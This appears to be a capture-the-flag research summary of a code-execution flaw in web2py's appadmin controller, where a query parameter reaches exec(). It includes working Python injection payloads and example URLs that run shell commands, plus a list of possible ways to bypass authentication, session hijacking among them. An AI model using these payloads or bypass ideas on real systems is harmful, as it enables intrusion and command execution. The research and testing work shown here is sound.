# Web2py Vulnerability Research - Summary ## Vulnerability Discovered ### RCE in appadmin.py via eval_in_global_env() **Type**: Remote Code Execution (RCE) **Location**: `/web2py/applications/*/controllers/appadmin.py` **Lines**: 92-115 **Authentication**: Required (Protected by credentials) ### Technical Details The `appadmin.py` controller contains an unsafe `eval_in_global_env()` function that directly executes user input: ```python def eval_in_global_env(text): exec('_ret=%s' % text, {}, global_env) return global_env['_ret'] def get_query(request): try: return eval_in_global_env(request.vars.query) # USER INPUT HERE! except Exception: return None ``` This function is called by two endpoints: 1. **`csv()` function** (line 170) - `/appadmin/csv/db?query=` 2. **`select()` function** (line 199) - `/appadmin/select/db?query=` ### Exploitation **Payload Format**: ``` ?query=__import__('os').popen('/readflag').read() ?query=__import__('subprocess').check_output('/readflag', shell=True, text=True) ``` **Example URLs**: ``` https://localhost:5000/welcome/appadmin/select/db?query=__import__('os').popen('id').read() https://localhost:5000/examples/appadmin/csv/db?query=__import__('os').popen('/readflag').read() ``` ### Current Blocker: Authentication All appadmin endpoints require authentication via `gluon.fileutils.check_credentials()`: ```python elif (request.application == 'admin' and not session.authorized) or \ (request.application != 'admin' and not gluon.fileutils.check_credentials(request)): redirect(URL('admin', 'default', 'index', vars=dict(send=URL(args=request.args, vars=request.vars)))) ``` **Status**: Returns 303 redirect to admin login when accessed without credentials ### Similarity to React2Shell (CVE-2025-55182) | React2Shell | Web2py appadmin RCE | |------------|---------------------| | Unsafe deserialization in Flight protocol | Unsafe exec() in appadmin | | User payload → deserialization → RCE | User query → exec() → RCE | | Unauthenticated by default | **Requires authentication** | | React Server Components | Web2py admin interface | ### Why This Matches the Challenge 1. ✅ **Stock web2py v3.1.1** - No custom code, real vulnerability 2. ✅ **Similar pattern to React2Shell** - User input → unsafe execution 3. ✅ **RCE capability** - Can execute `/readflag` if accessed 4. ⚠️ **Authentication required** - Need bypass or different entry point ### Possible Next Steps 1. **Find auth bypass** - Look for vulnerabilities in admin authentication 2. **Check default credentials** - Though docker-entrypoint.sh uses random password 3. **Alternative entry point** - Find another function that calls `eval_in_global_env()` 4. **Session exploitation** - Check if sessions can be hijacked/forged 5. **Different vulnerability** - The actual 0-day might be elsewhere ### Files to Review - ✅ `gluon/restricted.py` - Execution environment - ✅ `gluon/globals.py` - Session handling - ✅ `gluon/utils.py` - secure_loads/secure_dumps - ✅ `gluon/compileapp.py` - Template compilation - ✅ `applications/*/controllers/appadmin.py` - RCE found here - ⏳ `gluon/fileutils.py` - check_credentials() implementation - ⏳ `applications/admin/*` - Admin authentication flow - ⏳ `gluon/contrib/*` - Third-party modules ### Test Scripts Created 1. `exploit_appadmin_rce.py` - Exploit script for appadmin RCE (requires auth) 2. `test_appadmin_access.py` - Test authentication status 3. `enumerate_endpoints.py` - Enumerate accessible endpoints 4. `test_ajax_injection.py` - Test JavaScript injection (negative) 5. `test_cookie_session.py` - Test session cookie exploitation (negative) ## Conclusion We've successfully identified an RCE vulnerability in web2py's appadmin interface that matches the React2Shell pattern of unsafe code execution. However, it's protected by authentication. To complete the exploitation, we need either: - An authentication bypass vulnerability - A way to access eval_in_global_env() without going through appadmin - Verification that this is indeed the intended vulnerability (might require elevated privileges in the CTF scenario)